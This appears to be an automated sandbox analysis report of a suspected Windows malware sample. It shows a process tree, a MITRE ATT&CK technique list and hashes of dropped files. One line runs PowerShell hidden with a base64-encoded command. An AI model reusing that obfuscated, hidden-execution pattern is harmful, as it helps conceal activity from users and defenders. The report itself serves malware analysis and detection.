C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:5180
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:3460

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:5184

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
PID:1004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcb64646f8,0x7ffcb6464708,0x7ffcb6464718
  2⤵
  PID:3272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,3595262616633995181,18340801285442977740,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2
  2⤵
  PID:5524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,3595262616633995181,18340801285442977740,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2496 /prefetch:3
  2⤵
  PID:5648
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,3595262616633995181,18340801285442977740,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2948 /prefetch:8
  2⤵
  PID:2796
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,3595262616633995181,18340801285442977740,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3628 /prefetch:1
  2⤵
  PID:5520
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,3595262616633995181,18340801285442977740,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3636 /prefetch:1
  2⤵
  PID:1820
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,3595262616633995181,18340801285442977740,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4056 /prefetch:1
  2⤵
  PID:1840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,3595262616633995181,18340801285442977740,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3988 /prefetch:1
  2⤵
  PID:1892
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,3595262616633995181,18340801285442977740,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3740 /prefetch:8
  2⤵
  PID:3204
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,3595262616633995181,18340801285442977740,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3740 /prefetch:8
  2⤵
  PID:4712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,3595262616633995181,18340801285442977740,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5124 /prefetch:1
  2⤵
  PID:3528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,3595262616633995181,18340801285442977740,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4920 /prefetch:1
  2⤵
  PID:4176
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2108,3595262616633995181,18340801285442977740,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2572 /prefetch:8
  2⤵
  PID:5520
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2108,3595262616633995181,18340801285442977740,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4968 /prefetch:8
  2⤵
  PID:5152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2108,3595262616633995181,18340801285442977740,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2572 /prefetch:8
  2⤵
  PID:4020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2108,3595262616633995181,18340801285442977740,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2568 /prefetch:8
  2⤵
  PID:4556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,3595262616633995181,18340801285442977740,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4980 /prefetch:2
  2⤵
  PID:4820
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,3595262616633995181,18340801285442977740,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2548 /prefetch:1
  2⤵
  PID:2464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,3595262616633995181,18340801285442977740,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2480 /prefetch:1
  2⤵
  PID:5600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,3595262616633995181,18340801285442977740,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2416 /prefetch:1
  2⤵
  PID:3492
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,3595262616633995181,18340801285442977740,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2916 /prefetch:3
  2⤵
  PID:4100
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,3595262616633995181,18340801285442977740,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2484 /prefetch:1
  2⤵
  PID:5124
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,3595262616633995181,18340801285442977740,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2492 /prefetch:1
  2⤵
  PID:568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,3595262616633995181,18340801285442977740,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3112 /prefetch:1
  2⤵
  PID:3484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,3595262616633995181,18340801285442977740,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4956 /prefetch:2
  2⤵
  PID:2068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,3595262616633995181,18340801285442977740,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2928 /prefetch:1
  2⤵
  PID:976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,3595262616633995181,18340801285442977740,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1424 /prefetch:1
  2⤵
  PID:3684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,3595262616633995181,18340801285442977740,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=6012 /prefetch:2
  2⤵
  PID:5164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,3595262616633995181,18340801285442977740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5916 /prefetch:1
  2⤵
  PID:1556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,3595262616633995181,18340801285442977740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6132 /prefetch:1
  2⤵
  PID:404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,3595262616633995181,18340801285442977740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6724 /prefetch:1
  2⤵
  PID:5788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2108,3595262616633995181,18340801285442977740,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6700 /prefetch:8
  2⤵
  PID:5980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2108,3595262616633995181,18340801285442977740,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7052 /prefetch:8
  2⤵
  PID:1432
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,3595262616633995181,18340801285442977740,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=7156 /prefetch:2
  2⤵
  PID:5084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2108,3595262616633995181,18340801285442977740,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5656 /prefetch:8
  2⤵
  PID:920
- C:\Users\Admin\Downloads\HitmanPro_x64.exe
  "C:\Users\Admin\Downloads\HitmanPro_x64.exe"
  2⤵
  PID:976
- - C:\Users\Admin\AppData\Local\Temp\HitmanPro_x64.exe
    "C:\Users\Admin\AppData\Local\Temp\HitmanPro_x64.exe" /update:"C:\Users\Admin\Downloads\HitmanPro_x64.exe"
    3⤵
    PID:852
  - - C:\Users\Admin\Downloads\HitmanPro_x64.exe
      "C:\Users\Admin\Downloads\HitmanPro_x64.exe" /updated:"C:\Users\Admin\AppData\Local\Temp\HitmanPro_x64.exe"
      4⤵
      PID:3624

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4232

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4556 -ip 4556
1⤵
PID:5996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5748 -ip 5748
1⤵
PID:5012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5748 -ip 5748
1⤵
PID:4820

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4140

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:740

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4228

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3492

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1112

C:\Program Files\HitmanPro\hmpsched.exe
"C:\Program Files\HitmanPro\hmpsched.exe"
1⤵
PID:4432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3136 -ip 3136
1⤵
PID:5884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 5168 -ip 5168
1⤵
PID:5764

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:1672

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:1724

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:2624

C:\Users\Admin\Downloads\HitmanPro_x64.exe
"C:\Users\Admin\Downloads\HitmanPro_x64.exe"
1⤵
PID:4972
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.hitmanpro.com/en-us/buy-now.aspx?cmp=701j0000001noQUAAY
  2⤵
  PID:3796
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcb76146f8,0x7ffcb7614708,0x7ffcb7614718
    3⤵
    PID:1192
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,10769248056657307473,13673766692977936390,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
    3⤵
    PID:5936
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,10769248056657307473,13673766692977936390,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2460 /prefetch:3
    3⤵
    PID:3988
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,10769248056657307473,13673766692977936390,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2928 /prefetch:8
    3⤵
    PID:2464
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,10769248056657307473,13673766692977936390,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3556 /prefetch:1
    3⤵
    PID:5592
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,10769248056657307473,13673766692977936390,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3564 /prefetch:1
    3⤵
    PID:3840

C:\Program Files\HitmanPro\hmpsched.exe
"C:\Program Files\HitmanPro\hmpsched.exe"
1⤵
PID:344

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:1668

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:5472

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:1644

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4028

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1460

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:5968

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:6104

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:2612

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Power Settings

T1653

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e5d9ce0.rbs

Filesize
20KB

MD5
cd3ea7b1fa40fc186a195e9304fcef9d

SHA1
a8004f83eb43c717a88189249bfb03fa02b07908

SHA256
27bb14d7490c27296465c6a89e4fa3f3373a548deedbc25ccf258a46947d8361

SHA512
d460a9a50ef8b080f46d31e474afbfbb738c58e26db19862a733d28d3194bdaecf2267d45cbdb4a4249ce0965d44a81e3ca3bdff42f820f6853c72ccdade0ab5

Download Submit
C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

Filesize
2.5MB

MD5
d9be46be1a2562d79ce72dffa95325ea

SHA1
fc11a2e350f3dfc3667d0115145303079adea3e2

SHA256
18162d484a41702b97fb4124bf58f1a9f215a03484afc60fc2a6d18cbea27a06

SHA512
3a45b1b132e006024f095ad0e99d8e7cb4d290aa3018c64ebdb31ab01ccc808ac1b1d6ae9986d49bc61ca1205e67db51c8e4a4134115f7285a5f8fd1d0afc91d

Download Submit
C:\ProgramData\AAEHIDAKEC.exe

Filesize
4.3MB

MD5
2b40a46d4856cb9f79ecdd2d19ad74e7

SHA1
1dc70b5aecf5e570e06dcabbc94a795df1f1549f

SHA256
394f23df8704f763b90149b09c73a1a841e8590541d33b98a6c7412ff9bfa27c

SHA512
6176850bb3ab1b7bb00c63b1ae4d8e5277dbb41dc4d8f8d3116bdf79c1aaeb111576911b32901745af63225faf4af07786949d7d761208475c555be1efa84654

Download Submit
C:\ProgramData\AEHDAKFIJJKK\AECAKE

Filesize
114KB

MD5
93033b50faaecfc1f3413dd113d4f365

SHA1
a04840585ab5160bad05c13aabe2a875416b0d79

SHA256
51ac570ca79b6f12f89240532e24cf26a9cab7e982b6570e54b10769c6f60e25

SHA512
986351814483f2072bf4b83a5bcd221be88f888f90f85ce588807e354b9716e96e0f238735740b6217bfd28ffc75eedeabb2d56d1a10a384ced5501b346611ce

Download Submit
C:\ProgramData\AEHDAKFIJJKK\AECAKE

Filesize
60KB

MD5
6656408f9748787cb00790e7e5c89700

SHA1
ec2d6ae0b941918d7dae9cf922e85810c68c3398

SHA256
faf0fcb03905bdfde1c932346890108e12122f27db7c5364c01ae35fb4e52969

SHA512
e02c54cf5434bb68bfd15a143c4c320a7c92d8f0126f52f56a7389830f1628a5e67c63d6c6562eaf27a9b0fe094d41a86fdac16ec619fa0454df6d23c3964561

Download Submit
C:\ProgramData\AEHDAKFIJJKK\CGIDAA

Filesize
8KB

MD5
797ee84c3fa4ae5127513fd747a6eaf1

SHA1
ebbda919d974cb9e7b137cb26a605196474a467b

SHA256
